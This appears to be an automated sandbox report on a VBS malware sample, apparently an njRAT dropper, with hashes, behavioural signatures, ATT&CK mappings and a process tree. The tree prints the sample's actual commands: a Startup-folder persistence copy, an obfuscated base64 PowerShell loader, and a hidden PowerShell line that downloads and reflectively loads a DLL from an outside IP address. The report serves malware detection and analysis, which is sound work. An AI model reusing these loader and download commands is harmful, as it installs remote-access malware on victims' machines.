ac630699a97a8f5c8273f1531df135ae3dd88ff8bd952a5944783f044cff2871

General

Target

NJRATCASA22.vbs
Size

330KB
MD5

8a4f7794001fbe25ab1820e9a66db1da
SHA1

fd1e5582b21480d6d19b247fe71f96d500314038
SHA256

6cbb94dab89d523749b578de2590ad064049c0574476f553df9ffcf9d13ddf51
SHA512

dd5305d5613314d78972169320971021e9d98af6c7cc5b2cb494996fe275cea87ad9aa9cd4f0109b482e6bb45b88f1fedf557c82925c68b152c7da110a292751

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.99.190.34/dll/1.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1056 powershell.exe

flow	pid	process
4	1056	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

320 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1464 powershell.exe
588 powershell.exe
1056 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1464 powershell.exe
Token: SeDebugPrivilege 588 powershell.exe
Token: SeDebugPrivilege 1056 powershell.exe

pid	process
320	PING.EXE

pid	process
1464	powershell.exe
588	powershell.exe
1056	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 792 wrote to memory of 1500	792	WScript.exe	cmd.exe
PID 792 wrote to memory of 1500	792	WScript.exe	cmd.exe
PID 792 wrote to memory of 1500	792	WScript.exe	cmd.exe
PID 1500 wrote to memory of 320	1500	cmd.exe	PING.EXE
PID 1500 wrote to memory of 320	1500	cmd.exe	PING.EXE
PID 1500 wrote to memory of 320	1500	cmd.exe	PING.EXE
PID 1500 wrote to memory of 1464	1500	cmd.exe	powershell.exe
PID 1500 wrote to memory of 1464	1500	cmd.exe	powershell.exe
PID 1500 wrote to memory of 1464	1500	cmd.exe	powershell.exe
PID 792 wrote to memory of 588	792	WScript.exe	powershell.exe
PID 792 wrote to memory of 588	792	WScript.exe	powershell.exe
PID 792 wrote to memory of 588	792	WScript.exe	powershell.exe
PID 588 wrote to memory of 1056	588	powershell.exe	powershell.exe
PID 588 wrote to memory of 1056	588	powershell.exe	powershell.exe
PID 588 wrote to memory of 1056	588	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DE⁂OQ⁂y⁂C4⁂OQ⁂5⁂C4⁂MQ⁂5⁂D⁂⁂Lg⁂z⁂DQ⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂LgB0⁂Hg⁂d⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂EM⁂b⁂Bh⁂HM⁂cwBM⁂Gk⁂YgBy⁂GE⁂cgB5⁂DM⁂LgBD⁂Gw⁂YQBz⁂HM⁂MQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂TwBI⁂Ho⁂Uw⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂EE⁂UwBB⁂EM⁂M⁂⁂y⁂CU⁂V⁂BB⁂FI⁂SgBO⁂D⁂⁂Mg⁂l⁂DQ⁂Ng⁂w⁂DI⁂JQBl⁂HM⁂YQBi⁂C8⁂VwBF⁂E4⁂YQBz⁂GE⁂QwBj⁂HQ⁂YQBy⁂Eo⁂Tg⁂v⁂Gc⁂cgBv⁂C4⁂NQB1⁂GU⁂LgBh⁂HM⁂cwBh⁂GM⁂d⁂Bh⁂HI⁂agBu⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://192.99.190.34/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('OHzS').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
b6ecc4bda7a591cd3aee439b56c01304

SHA1
fcc98c94aada74e6d199fb16ec258edf7a70737d

SHA256
48fd458780744446e033b792086341450adbc36312dbf6da4ac28d7b4ae94ecc

SHA512
e8017731ae49d9e4090c8a1ac264255f9997052ff46b6387536cbe5827d1e07a5c38c3ac83fc1c4b84e248791b28f53c8fc8606978759a08e7c13ecab7c8079d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
b6ecc4bda7a591cd3aee439b56c01304

SHA1
fcc98c94aada74e6d199fb16ec258edf7a70737d

SHA256
48fd458780744446e033b792086341450adbc36312dbf6da4ac28d7b4ae94ecc

SHA512
e8017731ae49d9e4090c8a1ac264255f9997052ff46b6387536cbe5827d1e07a5c38c3ac83fc1c4b84e248791b28f53c8fc8606978759a08e7c13ecab7c8079d

Download Submit
memory/588-63-0x00000000027B0000-0x00000000027B2000-memory.dmp

Filesize
8KB

Download
memory/588-70-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/588-66-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/588-62-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

Filesize
11.4MB

Download
memory/588-64-0x00000000027B2000-0x00000000027B4000-memory.dmp

Filesize
8KB

Download
memory/588-65-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/792-54-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

Filesize
8KB

Download
memory/1056-69-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

Filesize
11.4MB

Download
memory/1056-71-0x0000000002720000-0x0000000002722000-memory.dmp

Filesize
8KB

Download
memory/1056-72-0x0000000002722000-0x0000000002724000-memory.dmp

Filesize
8KB

Download
memory/1056-73-0x0000000002724000-0x0000000002727000-memory.dmp

Filesize
12KB

Download
memory/1056-74-0x000000000272B000-0x000000000274A000-memory.dmp

Filesize
124KB

Download
memory/1464-56-0x000007FEF3820000-0x000007FEF437D000-memory.dmp

Filesize
11.4MB

Download
memory/1464-59-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/1464-58-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/1464-57-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing